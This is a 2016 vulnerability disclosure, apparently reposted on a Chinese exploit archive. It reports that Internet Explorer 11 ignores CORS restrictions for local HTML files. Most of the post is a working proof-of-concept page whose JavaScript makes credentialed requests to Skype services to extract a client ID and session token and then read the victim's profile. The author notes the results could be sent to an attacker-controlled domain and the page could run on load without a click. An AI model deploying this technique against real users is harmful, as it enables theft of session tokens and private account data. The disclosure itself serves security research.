首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer 11 CORS Disrespect
来源:riramar at gmail.com 作者:Santos 发布时间:2016-09-23  
IE11 is not following CORS specification for local files like Chrome
and Firefox.
I've contacted Microsoft and they say this is not a security issue so
I'm sharing it.
>From my tests IE11 is not following CORS specifications for local
files as supposed to be.
In order to prove I've created a malicious html file with the content below.

<html>
<script>
function createCORSRequest(method, url) {
  var xhr = new XMLHttpRequest();
  if ("withCredentials" in xhr) {
    xhr.open(method, url, true);
  } else if (typeof XDomainRequest != "undefined") {
    xhr = new XDomainRequest();
    xhr.open(method, url);
  } else {
    xhr = null;
  }
  return xhr;
}

function getClientID(text) {
  return text.match('client_id:"([^"]*)",redirect_uri')[1];
}

function getToken(text) {
  return text.match('<input type="hidden" name="skypetoken"
value="([^"]*)"/>')[1];
}

function makeCorsRequest() {

  var url0 = 'https://s4w.cdn.skype.com/0-224-0/js/index.js';

  var xhr0 = createCORSRequest('GET', url0 );
  if (!xhr0) {
alert('CORS not supported');
return;
  }

  xhr0.withCredentials = true;

  xhr0.onload = function() {
var text0 = xhr0.responseText;
var clientid = getClientID(text0);
alert('Client ID: ' + clientid);

  var url1 = 'https://login.skype.com/login?client_id='+clientid+'&redirect_uri=https%3A%2F%2Fweb.skype.com%2F%3Fintcmp%3Daccountweb-_-uktrybeta';

  var xhr1 = createCORSRequest('GET', url1);
  if (!xhr1) {
alert('CORS not supported');
return;
  }

  xhr1.withCredentials = true;

  xhr1.onload = function() {
var text1 = xhr1.responseText;
var token = getToken(text1);
alert('Skype Token: ' + token);
  var url2 = 'https://api.skype.com/users/self/profile';

  var xhr2 = createCORSRequest('GET', url2);
  if (!xhr2) {
alert('CORS not supported');
return;
  }

  xhr2.withCredentials = true;
  xhr2.setRequestHeader("X-Skypetoken", token);

  xhr2.onload = function() {
var text2 = xhr2.responseText;
alert('User Profile: ' + text2);
  };

  xhr2.onerror = function() {
alert('Woops, there was an error making the request.');
  };

  xhr2.send();
  };

  xhr1.onerror = function() {
alert('Woops, there was an error making the request.');
  };

  xhr1.send();
  };

  xhr0.onerror = function() {
alert('Woops, there was an error making the request.');
  };

  xhr0.send();

}
</script>
<body>
<button onclick="makeCorsRequest()">Click me</button>
</body>
</html>

The file above will be able to get an skype token and perform get on
the user profile. Instead of using alert() function I could send this
information to a domain that I have control.
Of course the victim needs to open the file from his local drive or
maybe another application can open an IE instance.
If the user is logged on a Microsoft account and open the html file
with the content above with onload function instead of onclick I'd be
able to get his profile data.
This is a simple scenario. An attacker would be able to get any data
from any domain that do not require a unique ID (e.g. CSRF token)
which the attacker doesn't have and is unable to get.
If you do the same test on Chrome or Firefox the browser will follow
CORS specification and block the response content since no CORS
headers is present in the response.
I tested on IE11 running on Win7SP1  with all security patches and it
worked. On Win10 didn't work. I didn't test in any server with CORS
enabled.
If you think in another malicious scenario please let me know.

Thanks!
Ricardo Iramar

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kaltura 11.1.0-2 - Remote Code
·Kerberos in Microsoft Windows
·DllHijackAuditor 3.5 - Stack O
·Metasploit Web UI - Diagnostic
·VegaDNS 0.13.2 - Remote Comman
·Metasploit Web UI Static secre
·Dolphin 7.3.0 - Error-Based SQ
·Android Stagefright MP4 tx3g I
·ZineBasic 1.1 - Arbitrary File
·Linux Kernel 4.6.3 Netfilter P
·EKG Gadu 1.9~pre+r2855-3+b1 -
·FreePBX < 13.0.188 - Remote Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved